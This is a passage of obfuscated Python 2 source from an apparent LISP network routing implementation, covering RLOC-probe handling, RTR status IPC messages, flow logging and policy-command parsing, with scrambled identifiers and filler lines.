if 28 - 28: oO0o
if 45 - 45: I1Ii111 % OoOoOO00 / I1Ii111 % OoO0O00 . I1IiiI
if 100 - 100: OoO0O00 - Ii1I + i1IIi / o0oOOo0O0Ooo / IiII
if ( I1II . rloc_next_hop != None ) :
Oo00 = lisp_get_host_route_next_hop ( oo0o00OO )
if ( Oo00 ) : lisp_install_host_route ( oo0o00OO , Oo00 , False )
if 85 - 85: OoOoOO00
if 90 - 90: o0oOOo0O0Ooo . OoOoOO00 - i11iIiiIii * IiII
if 37 - 37: OoooooooOO - I1Ii111 . Ii1I . i1IIi * IiII / ooOoO0o
if 12 - 12: OoooooooOO
if 8 - 8: i11iIiiIii . I1Ii111 * o0oOOo0O0Ooo . ooOoO0o
if 94 - 94: I1ii11iIi11i % OoOoOO00 - OoooooooOO
if ( I1II . rloc . is_null ( ) ) :
I1II . rloc . copy_address ( iIii1iI1I1IiI . rloc )
if 42 - 42: I1Ii111 - i1IIi
if 91 - 91: iII111i . OOooOOo / iIii1I11I1II1 . Oo0Ooo . II111iiii . OoOoOO00
if 31 - 31: OoO0O00 . I1ii11iIi11i % I11i - II111iiii
if 70 - 70: ooOoO0o - IiII - OoO0O00 / I11i
if 59 - 59: IiII % ooOoO0o . iII111i / Ii1I * Ii1I
i1I1I = None if ( OOo0oOOO0 . is_null ( ) ) else iiI1I1IIi
OO0ooOo0ooooo = iiI1I1IIi if ( OOo0oOOO0 . is_null ( ) ) else OOo0oOOO0
lisp_send_map_request ( lisp_sockets , 0 , i1I1I , OO0ooOo0ooooo , I1II )
oOiIiI = iIii1iI1I1IiI
if 55 - 55: I1Ii111 . I1IiiI * iIii1I11I1II1 / Ii1I . I1IiiI
if 63 - 63: ooOoO0o . Ii1I - I1Ii111 - oO0o * I1Ii111 + ooOoO0o
if 85 - 85: II111iiii + I1ii11iIi11i
if 33 - 33: iII111i
if ( I1IIIIiI1i ) : lisp_install_host_route ( oo0o00OO , I1IIIIiI1i , False )
if 14 - 14: O0 * Oo0Ooo / i1IIi
if 95 - 95: O0 % i1IIi % ooOoO0o % oO0o - I1IiiI
if 78 - 78: II111iiii % OOooOOo
if 6 - 6: OOooOOo
if 21 - 21: I1Ii111 - Ii1I - i1IIi % oO0o
if ( Oo00 ) : lisp_install_host_route ( oo0o00OO , Oo00 , True )
if 55 - 55: OOooOOo + oO0o - II111iiii
if 5 - 5: iII111i * OoooooooOO . OoO0O00 % ooOoO0o + Ii1I
if 59 - 59: OoOoOO00
if 96 - 96: I1IiiI
I1I1 += 1
if ( ( I1I1 % 10 ) == 0 ) : time . sleep ( 0.020 )
if 3 - 3: OoooooooOO
if 3 - 3: IiII / O0 * i11iIiiIii . iII111i - iIii1I11I1II1
if 56 - 56: ooOoO0o
lprint ( "---------- End RLOC Probing ----------" )
return
if 82 - 82: ooOoO0o . IiII . I1Ii111 - iIii1I11I1II1 + II111iiii . OoOoOO00
if 59 - 59: Oo0Ooo
if 98 - 98: I1Ii111 * II111iiii / Oo0Ooo . Oo0Ooo % I1Ii111
if 52 - 52: OoOoOO00
if 59 - 59: ooOoO0o / OoooooooOO
if 71 - 71: OOooOOo + I11i * O0 / o0oOOo0O0Ooo + I1IiiI + Ii1I
if 41 - 41: ooOoO0o * I1Ii111
if 40 - 40: OoOoOO00
def lisp_update_rtr_updown ( rtr , updown ) :
global lisp_ipc_socket
if 60 - 60: IiII . i11iIiiIii * II111iiii . Ii1I
if 10 - 10: O0
if 65 - 65: I11i % i11iIiiIii + i11iIiiIii % II111iiii
if 95 - 95: I1Ii111 - I11i . II111iiii . i1IIi / II111iiii + Oo0Ooo
if ( lisp_i_am_itr == False ) : return
if 96 - 96: iIii1I11I1II1 * iII111i / OOooOOo * iIii1I11I1II1 - O0
if 28 - 28: I11i / I1IiiI - I1Ii111 + I1ii11iIi11i % iIii1I11I1II1
if 35 - 35: iIii1I11I1II1 % Oo0Ooo % iII111i / iIii1I11I1II1 - I1ii11iIi11i . Oo0Ooo
if 81 - 81: II111iiii + oO0o
if 67 - 67: ooOoO0o + I11i - I1ii11iIi11i - OoooooooOO
if ( lisp_register_all_rtrs ) : return
if 37 - 37: I11i % I1IiiI
I1iii1 = rtr . print_address_no_iid ( )
if 87 - 87: IiII % iIii1I11I1II1 * I1ii11iIi11i
if 43 - 43: Ii1I - IiII / i11iIiiIii + OoOoOO00 + I1ii11iIi11i - o0oOOo0O0Ooo
if 39 - 39: OoOoOO00 - i1IIi / oO0o % I11i * o0oOOo0O0Ooo * I1IiiI
if 79 - 79: Ii1I
if 56 - 56: I1ii11iIi11i
if ( lisp_rtr_list . has_key ( I1iii1 ) == False ) : return
if 40 - 40: OoooooooOO
updown = "up" if updown else "down"
lprint ( "Send ETR IPC message, RTR {} has done {}" . format (
red ( I1iii1 , False ) , bold ( updown , False ) ) )
if 100 - 100: IiII - I11i
if 79 - 79: iII111i % O0
if 73 - 73: Oo0Ooo
if 13 - 13: OOooOOo - ooOoO0o
oOOO0oo0 = "rtr%{}%{}" . format ( I1iii1 , updown )
oOOO0oo0 = lisp_command_ipc ( oOOO0oo0 , "lisp-itr" )
lisp_ipc ( oOOO0oo0 , lisp_ipc_socket , "lisp-etr" )
return
if 8 - 8: I1Ii111 % oO0o
if 19 - 19: O0 + OoO0O00 - i1IIi % OoOoOO00 / Oo0Ooo + OoooooooOO
if 93 - 93: i11iIiiIii % OOooOOo . I11i * ooOoO0o
if 90 - 90: OoO0O00
if 54 - 54: OOooOOo + Oo0Ooo * o0oOOo0O0Ooo - iIii1I11I1II1 * ooOoO0o
if 76 - 76: i11iIiiIii * I1IiiI - IiII . o0oOOo0O0Ooo % iII111i . i11iIiiIii
if 69 - 69: O0 + o0oOOo0O0Ooo / ooOoO0o
def lisp_process_rloc_probe_reply ( rloc_entry , source , port , map_reply , ttl ,
mrloc ) :
I1II = rloc_entry . rloc
o0OOO = map_reply . nonce
I1io00 = map_reply . hop_count
oO0oo000O = bold ( "RLOC-probe reply" , False )
iII1Ii1 = I1II . print_address_no_iid ( )
III11III = source . print_address_no_iid ( )
I1i1iIiii = lisp_rloc_probe_list
oOooo0o = rloc_entry . json . json_string if rloc_entry . json else None
i1 = lisp_get_timestamp ( )
if 38 - 38: IiII + I1Ii111 % Ii1I / Ii1I
if 39 - 39: iII111i * i11iIiiIii
if 31 - 31: IiII - Ii1I . i1IIi
if 1 - 1: o0oOOo0O0Ooo + OOooOOo % Ii1I - O0 / I1ii11iIi11i
if 20 - 20: o0oOOo0O0Ooo + II111iiii * Ii1I . OoooooooOO
if 88 - 88: O0 + iIii1I11I1II1 . o0oOOo0O0Ooo . iIii1I11I1II1 - Ii1I
if ( mrloc != None ) :
o0OOiiiiII = mrloc . rloc . print_address_no_iid ( )
if ( mrloc . multicast_rloc_probe_list . has_key ( iII1Ii1 ) == False ) :
iIi1iiiI1iI1iiiiii = lisp_rloc ( )
iIi1iiiI1iI1iiiiii = copy . deepcopy ( mrloc )
iIi1iiiI1iI1iiiiii . rloc . copy_address ( I1II )
iIi1iiiI1iI1iiiiii . multicast_rloc_probe_list = { }
mrloc . multicast_rloc_probe_list [ iII1Ii1 ] = iIi1iiiI1iI1iiiiii
if 88 - 88: I1IiiI % I1IiiI / II111iiii - IiII
iIi1iiiI1iI1iiiiii = mrloc . multicast_rloc_probe_list [ iII1Ii1 ]
iIi1iiiI1iI1iiiiii . last_rloc_probe_nonce = mrloc . last_rloc_probe_nonce
iIi1iiiI1iI1iiiiii . last_rloc_probe = mrloc . last_rloc_probe
I1I111iIiI , iiI1I1IIi , OOo0oOOO0 = lisp_rloc_probe_list [ o0OOiiiiII ] [ 0 ]
iIi1iiiI1iI1iiiiii . process_rloc_probe_reply ( i1 , o0OOO , iiI1I1IIi , OOo0oOOO0 , I1io00 , ttl , oOooo0o )
mrloc . process_rloc_probe_reply ( i1 , o0OOO , iiI1I1IIi , OOo0oOOO0 , I1io00 , ttl , oOooo0o )
return
if 72 - 72: OoO0O00 - I1ii11iIi11i . Oo0Ooo / OoO0O00
if 86 - 86: i11iIiiIii - oO0o . i11iIiiIii
if 51 - 51: OoO0O00 - OoO0O00 * IiII
if 24 - 24: OoooooooOO . II111iiii
if 97 - 97: II111iiii . O0
if 18 - 18: iII111i
if 35 - 35: ooOoO0o / O0 / iIii1I11I1II1 - iIii1I11I1II1 + I11i
o0o00O0oOooO0 = iII1Ii1
if ( I1i1iIiii . has_key ( o0o00O0oOooO0 ) == False ) :
o0o00O0oOooO0 += ":" + str ( port )
if ( I1i1iIiii . has_key ( o0o00O0oOooO0 ) == False ) :
o0o00O0oOooO0 = III11III
if ( I1i1iIiii . has_key ( o0o00O0oOooO0 ) == False ) :
o0o00O0oOooO0 += ":" + str ( port )
lprint ( " Received unsolicited {} from {}/{}, port {}" . format ( oO0oo000O , red ( iII1Ii1 , False ) , red ( III11III ,
# o0oOOo0O0Ooo
False ) , port ) )
return
if 15 - 15: oO0o % Oo0Ooo * i1IIi / OoO0O00 . iIii1I11I1II1 - O0
if 20 - 20: ooOoO0o + Oo0Ooo - Oo0Ooo
if 2 - 2: i1IIi - IiII . I1ii11iIi11i / i1IIi
if 92 - 92: ooOoO0o - iII111i
if 69 - 69: iII111i
if 48 - 48: O0 + o0oOOo0O0Ooo . oO0o - IiII * OoooooooOO . OoO0O00
if 63 - 63: oO0o * OoO0O00 * oO0o
if 31 - 31: Oo0Ooo
for I1II , iiI1I1IIi , OOo0oOOO0 in lisp_rloc_probe_list [ o0o00O0oOooO0 ] :
if ( lisp_i_am_rtr ) :
if ( I1II . translated_port != 0 and I1II . translated_port != port ) :
continue
if 90 - 90: I11i . IiII * iIii1I11I1II1 . I11i + i1IIi
if 67 - 67: I1Ii111 . I1ii11iIi11i
I1II . process_rloc_probe_reply ( i1 , o0OOO , iiI1I1IIi , OOo0oOOO0 , I1io00 , ttl , oOooo0o )
if 2 - 2: O0 + I1Ii111
return
if 82 - 82: Ii1I / iII111i
if 13 - 13: I11i + iII111i
if 54 - 54: I1ii11iIi11i - I1IiiI . Ii1I
if 59 - 59: Oo0Ooo + I1ii11iIi11i
if 87 - 87: ooOoO0o * OoooooooOO + OoO0O00 + oO0o - I1Ii111
if 70 - 70: i1IIi . Ii1I / Ii1I
if 9 - 9: iII111i + I1Ii111 + iII111i % ooOoO0o + i11iIiiIii + i11iIiiIii
if 45 - 45: i1IIi + I1ii11iIi11i
def lisp_db_list_length ( ) :
I1I1 = 0
for Oooo00oo in lisp_db_list :
I1I1 += len ( Oooo00oo . dynamic_eids ) if Oooo00oo . dynamic_eid_configured ( ) else 1
I1I1 += len ( Oooo00oo . eid . iid_list )
if 49 - 49: i11iIiiIii . I1ii11iIi11i
return ( I1I1 )
if 91 - 91: ooOoO0o - OOooOOo - OOooOOo * o0oOOo0O0Ooo
if 33 - 33: II111iiii
if 39 - 39: ooOoO0o + I11i
if 24 - 24: o0oOOo0O0Ooo
if 5 - 5: i11iIiiIii - oO0o + o0oOOo0O0Ooo % ooOoO0o
if 63 - 63: oO0o
if 7 - 7: IiII / i11iIiiIii - OOooOOo
if 9 - 9: II111iiii + i11iIiiIii % I1Ii111 - Oo0Ooo * OOooOOo
def lisp_is_myeid ( eid ) :
for Oooo00oo in lisp_db_list :
if ( eid . is_more_specific ( Oooo00oo . eid ) ) : return ( True )
if 55 - 55: I1Ii111 + ooOoO0o
return ( False )
if 58 - 58: iII111i . I1ii11iIi11i - Oo0Ooo % o0oOOo0O0Ooo + I1Ii111
if 58 - 58: oO0o . ooOoO0o . I1IiiI . Oo0Ooo * iIii1I11I1II1 - iII111i
if 96 - 96: OOooOOo % o0oOOo0O0Ooo / iIii1I11I1II1
if 60 - 60: i1IIi / iIii1I11I1II1 + I11i % iII111i
if 64 - 64: I11i . i11iIiiIii / iIii1I11I1II1 . I11i
if 73 - 73: OoO0O00 % iIii1I11I1II1 + IiII * I1Ii111 % II111iiii
if 20 - 20: I11i % I1ii11iIi11i . OoO0O00 % OoOoOO00
if 84 - 84: OoooooooOO / i11iIiiIii . IiII / I1IiiI
if 62 - 62: iII111i - I1IiiI + OoooooooOO
def lisp_format_macs ( sa , da ) :
sa = sa [ 0 : 4 ] + "-" + sa [ 4 : 8 ] + "-" + sa [ 8 : 12 ]
da = da [ 0 : 4 ] + "-" + da [ 4 : 8 ] + "-" + da [ 8 : 12 ]
return ( "{} -> {}" . format ( sa , da ) )
if 59 - 59: iIii1I11I1II1 + i11iIiiIii * oO0o . Oo0Ooo . I1Ii111
if 49 - 49: II111iiii
if 99 - 99: Oo0Ooo . OOooOOo
if 85 - 85: OoOoOO00 . IiII + oO0o - II111iiii
if 70 - 70: O0 % I1Ii111
if 13 - 13: I1ii11iIi11i % OoO0O00 / Ii1I * IiII
if 82 - 82: ooOoO0o % Oo0Ooo
def lisp_get_echo_nonce ( rloc , rloc_str ) :
if ( lisp_nonce_echoing == False ) : return ( None )
if 26 - 26: OoO0O00 + i11iIiiIii % I11i . I1ii11iIi11i
if ( rloc ) : rloc_str = rloc . print_address_no_iid ( )
oooooO0oO0o = None
if ( lisp_nonce_echo_list . has_key ( rloc_str ) ) :
oooooO0oO0o = lisp_nonce_echo_list [ rloc_str ]
if 76 - 76: i1IIi + ooOoO0o - Oo0Ooo + OoOoOO00 / I1ii11iIi11i . OOooOOo
return ( oooooO0oO0o )
if 50 - 50: IiII - Ii1I % iIii1I11I1II1
if 60 - 60: o0oOOo0O0Ooo - Oo0Ooo
if 92 - 92: OoOoOO00 + IiII . OoO0O00 % iII111i / II111iiii / I11i
if 62 - 62: I1ii11iIi11i
if 100 - 100: iII111i / ooOoO0o / IiII % II111iiii
if 6 - 6: OoooooooOO - I1IiiI + OoooooooOO
if 89 - 89: oO0o % Oo0Ooo . O0 . ooOoO0o
if 46 - 46: IiII * I11i - OoO0O00 - Ii1I
def lisp_decode_dist_name ( packet ) :
I1I1 = 0
OoOO = ""
if 62 - 62: OOooOOo % OoooooooOO * ooOoO0o * I1ii11iIi11i * o0oOOo0O0Ooo
while ( packet [ 0 : 1 ] != "\0" ) :
if ( I1I1 == 255 ) : return ( [ None , None ] )
OoOO += packet [ 0 : 1 ]
packet = packet [ 1 : : ]
I1I1 += 1
if 36 - 36: I1ii11iIi11i / o0oOOo0O0Ooo - I11i . i1IIi . Ii1I % IiII
if 84 - 84: II111iiii . Ii1I
packet = packet [ 1 : : ]
return ( packet , OoOO )
if 70 - 70: i1IIi
if 52 - 52: OoooooooOO % oO0o - I11i % OoOoOO00 . II111iiii
if 62 - 62: Ii1I . I1ii11iIi11i . iII111i + I11i * o0oOOo0O0Ooo
if 56 - 56: oO0o * iIii1I11I1II1 . II111iiii - II111iiii + II111iiii - i11iIiiIii
if 79 - 79: iII111i
if 29 - 29: Ii1I * I1Ii111 / OoO0O00 - O0 - i11iIiiIii * I1IiiI
if 2 - 2: OoOoOO00 . I1ii11iIi11i * I1ii11iIi11i
if 42 - 42: OoO0O00 . OoO0O00 + II111iiii - IiII - OOooOOo * Oo0Ooo
def lisp_write_flow_log ( flow_log ) :
I1ii1ii = open ( "./logs/lisp-flow.log" , "a" )
if 47 - 47: oO0o - OoooooooOO + iII111i
I1I1 = 0
for o00oo00O0OoOo in flow_log :
IiiiIi1iiii11 = o00oo00O0OoOo [ 3 ]
OO0oOOO00 = IiiiIi1iiii11 . print_flow ( o00oo00O0OoOo [ 0 ] , o00oo00O0OoOo [ 1 ] , o00oo00O0OoOo [ 2 ] )
I1ii1ii . write ( OO0oOOO00 )
I1I1 += 1
if 5 - 5: ooOoO0o . OoO0O00
I1ii1ii . close ( )
del ( flow_log )
if 40 - 40: iII111i
I1I1 = bold ( str ( I1I1 ) , False )
lprint ( "Wrote {} flow entries to ./logs/lisp-flow.log" . format ( I1I1 ) )
return
if 87 - 87: IiII / II111iiii
if 44 - 44: OoO0O00 . I1Ii111 - OoooooooOO * OoOoOO00 . OoO0O00
if 84 - 84: OOooOOo . OOooOOo . oO0o % iII111i * Oo0Ooo - iIii1I11I1II1
if 4 - 4: iII111i
if 23 - 23: i1IIi . iIii1I11I1II1 / I1IiiI . OoOoOO00 . iII111i / IiII
if 65 - 65: Ii1I + IiII + I11i / I1Ii111 % iIii1I11I1II1
if 17 - 17: I1ii11iIi11i * OOooOOo % II111iiii
def lisp_policy_command ( kv_pair ) :
IiI1i1i1 = lisp_policy ( "" )
I1io0OooO = None
if 41 - 41: i1IIi
OOOO00o0OO0OOo0o = [ ]
for iIi1I1 in range ( len ( kv_pair [ "datetime-range" ] ) ) :
OOOO00o0OO0OOo0o . append ( lisp_policy_match ( ) )
if 86 - 86: Ii1I % oO0o - i11iIiiIii - O0 + IiII + iII111i
if 100 - 100: OoO0O00 . Oo0Ooo
for iI1Ii1 in kv_pair . keys ( ) :
Oo00OO0OO = kv_pair [ iI1Ii1 ]
if 53 - 53: OOooOOo
if 81 - 81: oO0o * I11i * O0
if 15 - 15: iIii1I11I1II1
if 54 - 54: Ii1I / i1IIi % I1IiiI + II111iiii * OOooOOo - i1IIi
if ( iI1Ii1 == "instance-id" ) :
for iIi1I1 in range ( len ( OOOO00o0OO0OOo0o ) ) :
O0o0OoO0 = Oo00OO0OO [ iIi1I1 ]
if ( O0o0OoO0 == "" ) : continue
OOoooOOO0oo0OO = OOOO00o0OO0OOo0o [ iIi1I1 ]
if ( OOoooOOO0oo0OO . source_eid == None ) :
OOoooOOO0oo0OO . source_eid = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
if 57 - 57: OOooOOo . I11i % OoOoOO00
if ( OOoooOOO0oo0OO . dest_eid == None ) :
OOoooOOO0oo0OO . dest_eid = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
if 68 - 68: iIii1I11I1II1 % I1ii11iIi11i % II111iiii / O0 + iII111i
OOoooOOO0oo0OO . source_eid . instance_id = int ( O0o0OoO0 )
OOoooOOO0oo0OO . dest_eid . instance_id = int ( O0o0OoO0 )
if 78 - 78: iII111i - OOooOOo / I1Ii111
if 38 - 38: I11i % i1IIi + o0oOOo0O0Ooo + I1ii11iIi11i + I1IiiI
if ( iI1Ii1 == "source-eid" ) :
for iIi1I1 in range ( len ( OOOO00o0OO0OOo0o ) ) :
O0o0OoO0 = Oo00OO0OO [ iIi1I1 ]
if ( O0o0OoO0 == "" ) : continue
OOoooOOO0oo0OO = OOOO00o0OO0OOo0o [ iIi1I1 ]
if ( OOoooOOO0oo0OO . source_eid == None ) :
OOoooOOO0oo0OO . source_eid = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
if 1 - 1: II111iiii * o0oOOo0O0Ooo . O0 - Ii1I / oO0o
IiIIi11i111 = OOoooOOO0oo0OO . source_eid . instance_id
OOoooOOO0oo0OO . source_eid . store_prefix ( O0o0OoO0 )
OOoooOOO0oo0OO . source_eid . instance_id = IiIIi11i111
if 17 - 17: OoooooooOO % OoooooooOO + Oo0Ooo + I1Ii111
if 56 - 56: I11i % OoOoOO00 - OoO0O00
if ( iI1Ii1 == "destination-eid" ) :
for iIi1I1 in range ( len ( OOOO00o0OO0OOo0o ) ) :
O0o0OoO0 = Oo00OO0OO [ iIi1I1 ]
if ( O0o0OoO0 == "" ) : continue
OOoooOOO0oo0OO = OOOO00o0OO0OOo0o [ iIi1I1 ]
if ( OOoooOOO0oo0OO . dest_eid == None ) :
OOoooOOO0oo0OO . dest_eid = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
if 31 - 31: iII111i % i11iIiiIii - Ii1I / OOooOOo - I1Ii111
IiIIi11i111 = OOoooOOO0oo0OO . dest_eid . instance_id
OOoooOOO0oo0OO . dest_eid . store_prefix ( O0o0OoO0 )
OOoooOOO0oo0OO . dest_eid . instance_id = IiIIi11i111
if 60 - 60: o0oOOo0O0Ooo + Oo0Ooo . O0
if 51 - 51: i11iIiiIii / iIii1I11I1II1 . I1IiiI - Ii1I * I1Ii111 . iII111i
if ( iI1Ii1 == "source-rloc" ) :
for iIi1I1 in range ( len ( OOOO00o0OO0OOo0o ) ) :
O0o0OoO0 = Oo00OO0OO [ iIi1I1 ]
if ( O0o0OoO0 == "" ) : continue
OOoooOOO0oo0OO = OOOO00o0OO0OOo0o [ iIi1I1 ]
OOoooOOO0oo0OO . source_rloc = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
OOoooOOO0oo0OO . source_rloc . store_prefix ( O0o0OoO0 )
if 72 - 72: Ii1I . I11i / i1IIi % i1IIi + I1ii11iIi11i
if 56 - 56: OoO0O00 - OoOoOO00 - II111iiii * o0oOOo0O0Ooo
if ( iI1Ii1 == "destination-rloc" ) :
for iIi1I1 in range ( len ( OOOO00o0OO0OOo0o ) ) :
O0o0OoO0 = Oo00OO0OO [ iIi1I1 ]
if ( O0o0OoO0 == "" ) : continue
OOoooOOO0oo0OO = OOOO00o0OO0OOo0o [ iIi1I1 ]
OOoooOOO0oo0OO . dest_rloc = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
OOoooOOO0oo0OO . dest_rloc . store_prefix ( O0o0OoO0 )
if 87 - 87: ooOoO0o * OoooooooOO % O0 * OoooooooOO . I1Ii111
if 66 - 66: OoO0O00 * Ii1I . OoO0O00
if ( iI1Ii1 == "rloc-record-name" ) :
for iIi1I1 in range ( len ( OOOO00o0OO0OOo0o ) ) :
O0o0OoO0 = Oo00OO0OO [ iIi1I1 ]
if ( O0o0OoO0 == "" ) : continue
OOoooOOO0oo0OO = OOOO00o0OO0OOo0o [ iIi1I1 ]
OOoooOOO0oo0OO . rloc_record_name = O0o0OoO0
if 90 - 90: II111iiii % Ii1I
if 67 - 67: I1IiiI - I11i - i11iIiiIii
if ( iI1Ii1 == "geo-name" ) :
for iIi1I1 in range ( len ( OOOO00o0OO0OOo0o ) ) :
O0o0OoO0 = Oo00OO0OO [ iIi1I1 ]
if ( O0o0OoO0 == "" ) : continue
OOoooOOO0oo0OO = OOOO00o0OO0OOo0o [ iIi1I1 ]
OOoooOOO0oo0OO . geo_name = O0o0OoO0
if 45 - 45: ooOoO0o - IiII / OoO0O00 / IiII
if 63 - 63: ooOoO0o . i11iIiiIii + iII111i . OoO0O00 / ooOoO0o % iII111i
if ( iI1Ii1 == "elp-name" ) :
for iIi1I1 in range ( len ( OOOO00o0OO0OOo0o ) ) :
O0o0OoO0 = Oo00OO0OO [ iIi1I1 ]
if ( O0o0OoO0 == "" ) : continue
OOoooOOO0oo0OO = OOOO00o0OO0OOo0o [ iIi1I1 ]
OOoooOOO0oo0OO . elp_name = O0o0OoO0
if 23 - 23: iIii1I11I1II1 - ooOoO0o / I11i * I11i
if 62 - 62: OOooOOo - I1IiiI * oO0o + O0 / ooOoO0o * iIii1I11I1II1
if ( iI1Ii1 == "rle-name" ) :
for iIi1I1 in range ( len ( OOOO00o0OO0OOo0o ) ) :
O0o0OoO0 = Oo00OO0OO [ iIi1I1 ]
if ( O0o0OoO0 == "" ) : continue
OOoooOOO0oo0OO = OOOO00o0OO0OOo0o [ iIi1I1 ]
OOoooOOO0oo0OO . rle_name = O0o0OoO0
if 25 - 25: I1Ii111 % Oo0Ooo + OoO0O00 % OOooOOo
if 85 - 85: I1IiiI . i11iIiiIii - ooOoO0o * I11i * OoOoOO00 * I11i
if ( iI1Ii1 == "json-name" ) :
for iIi1I1 in range ( len ( OOOO00o0OO0OOo0o ) ) :
O0o0OoO0 = Oo00OO0OO [ iIi1I1 ]
if ( O0o0OoO0 == "" ) : continue
OOoooOOO0oo0OO = OOOO00o0OO0OOo0o [ iIi1I1 ]
OOoooOOO0oo0OO . json_name = O0o0OoO0
if 29 - 29: I1Ii111 * I1Ii111 . iII111i + o0oOOo0O0Ooo
if 57 - 57: I1Ii111 - IiII
if ( iI1Ii1 == "datetime-range" ) :
for iIi1I1 in range ( len ( OOOO00o0OO0OOo0o ) ) :
O0o0OoO0 = Oo00OO0OO [ iIi1I1 ]
OOoooOOO0oo0OO = OOOO00o0OO0OOo0o [ iIi1I1 ]
if ( O0o0OoO0 == "" ) : continue
IIi1I1 = lisp_datetime ( O0o0OoO0 [ 0 : 19 ] )
IIo0 = lisp_datetime ( O0o0OoO0 [ 19 : : ] )
if ( IIi1I1 . valid_datetime ( ) and IIo0 . valid_datetime ( ) ) :
OOoooOOO0oo0OO . datetime_lower = IIi1I1
OOoooOOO0oo0OO . datetime_upper = IIo0
if 89 - 89: oO0o + iII111i
if 52 - 52: OOooOOo % O0 * I1ii11iIi11i . I1ii11iIi11i / IiII
if 7 - 7: II111iiii
if 7 - 7: iIii1I11I1II1 . O0 + Ii1I % I1IiiI * O0 + OoO0O00
if 3 - 3: Oo0Ooo * OoooooooOO * oO0o % OoOoOO00 * OoOoOO00 . ooOoO0o
if 16 - 16: ooOoO0o / o0oOOo0O0Ooo - O0 * I1IiiI
if 13 - 13: iII111i . iII111i % O0 % o0oOOo0O0Ooo
if ( iI1Ii1 == "set-action" ) :
IiI1i1i1 . set_action = Oo00OO0OO
if 99 - 99: OoO0O00 - OoOoOO00 + OoO0O00
if ( iI1Ii1 == "set-record-ttl" ) :
IiI1i1i1 . set_record_ttl = int ( Oo00OO0OO )
if 67 - 67: I1Ii111
if ( iI1Ii1 == "set-instance-id" ) :
if ( IiI1i1i1 . set_source_eid == None ) :
IiI1i1i1 . set_source_eid = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
if 31 - 31: OoO0O00 * Oo0Ooo % O0 * II111iiii + ooOoO0o * I1IiiI
if ( IiI1i1i1 . set_dest_eid == None ) :
IiI1i1i1 . set_dest_eid = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
if 77 - 77: ooOoO0o
I1io0OooO = int ( Oo00OO0OO )
IiI1i1i1 . set_source_eid . instance_id = I1io0OooO
IiI1i1i1 . set_dest_eid . instance_id = I1io0OooO
if 98 - 98: I1Ii111 + I1ii11iIi11i % OoO0O00 * Ii1I + iII111i
if ( iI1Ii1 == "set-source-eid" ) :
if ( IiI1i1i1 . set_source_eid == None ) :
IiI1i1i1 . set_source_eid = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
if 6 - 6: iII111i / iII111i . i11iIiiIii
IiI1i1i1 . set_source_eid . store_prefix ( Oo00OO0OO )
if ( I1io0OooO != None ) : IiI1i1i1 . set_source_eid . instance_id = I1io0OooO
if 12 - 12: I11i - OoO0O00
if ( iI1Ii1 == "set-destination-eid" ) :
if ( IiI1i1i1 . set_dest_eid == None ) :
IiI1i1i1 . set_dest_eid = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
if 68 - 68: IiII - OoOoOO00
IiI1i1i1 . set_dest_eid . store_prefix ( Oo00OO0OO )
if ( I1io0OooO != None ) : IiI1i1i1 . set_dest_eid . instance_id = I1io0OooO
if 22 - 22: i1IIi . IiII
if ( iI1Ii1 == "set-rloc-address" ) :
IiI1i1i1 . set_rloc_address = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
IiI1i1i1 . set_rloc_address . store_address ( Oo00OO0OO )
if 8 - 8: IiII % o0oOOo0O0Ooo . i11iIiiIii
if ( iI1Ii1 == "set-rloc-record-name" ) :
IiI1i1i1 . set_rloc_record_name = Oo00OO0OO
if 69 - 69: I1Ii111 / Ii1I - ooOoO0o
if ( iI1Ii1 == "set-elp-name" ) :
IiI1i1i1 . set_elp_name = Oo00OO0OO
if 38 - 38: II111iiii % OoooooooOO / OoooooooOO . Ii1I . Ii1I
if ( iI1Ii1 == "set-geo-name" ) :
IiI1i1i1 . set_geo_name = Oo00OO0OO
if 13 - 13: oO0o - i1IIi / i1IIi + OoooooooOO
if ( iI1Ii1 == "set-rle-name" ) :
IiI1i1i1 . set_rle_name = Oo00OO0OO
if 57 - 57: OoooooooOO / O0 + I1ii11iIi11i % I11i * oO0o / Ii1I
if ( iI1Ii1 == "set-json-name" ) :
IiI1i1i1 . set_json_name = Oo00OO0OO
if 49 - 49: I1IiiI * ooOoO0o * OOooOOo + OoO0O00 + ooOoO0o
if ( iI1Ii1 == "policy-name" ) :
IiI1i1i1 . policy_name = Oo00OO0OO
if 42 - 42: i1IIi . OoO0O00 % iII111i
if 57 - 57: I1ii11iIi11i / I1IiiI
if 69 - 69: iII111i - iII111i . OoO0O00 / oO0o - OoO0O00 + I1Ii111
if 98 - 98: iII111i . oO0o - O0 % I1IiiI . I1ii11iIi11i / i1IIi
if 72 - 72: I1IiiI / Oo0Ooo % IiII - O0 / O0 * O0
if 83 - 83: O0 / I1Ii111 - OoooooooOO
IiI1i1i1 . match_clauses = OOOO00o0OO0OOo0o
IiI1i1i1 . save_policy ( )
return
if 42 - 42: Ii1I / i1IIi - IiII / I1Ii111
if 39 - 39: OoooooooOO
lisp_policy_commands = {
"lisp policy" : [ lisp_policy_command , {
"policy-name" : [ True ] ,
"match" : [ ] ,
"instance-id" : [ True , 0 , 0xffffffff ] ,
"source-eid" : [ True ] ,
"destination-eid" : [ True ] ,
"source-rloc" : [ True ] ,
"destination-rloc" : [ True ] ,
"rloc-record-name" : [ True ] ,
"elp-name" : [ True ] ,
"geo-name" : [ True ] ,
"rle-name" : [ True ] ,
"json-name" : [ True ] ,
"datetime-range" : [ True ] ,
"set-action" : [ False , "process" , "drop" ] ,
"set-record-ttl" : [ True , 0 , 0x7fffffff ] ,
"set-instance-id" : [ True , 0 , 0xffffffff ] ,
"set-source-eid" : [ True ] ,
"set-destination-eid" : [ True ] ,
"set-rloc-address" : [ True ] ,
"set-rloc-record-name" : [ True ] ,
"set-elp-name" : [ True ] ,
"set-geo-name" : [ True ] ,
"set-rle-name" : [ True ] ,
"set-json-name" : [ True ] } ]
}
if 4 - 4: iIii1I11I1II1 - Oo0Ooo / OOooOOo % OoooooooOO . Oo0Ooo - Oo0Ooo
if 41 - 41: II111iiii . o0oOOo0O0Ooo
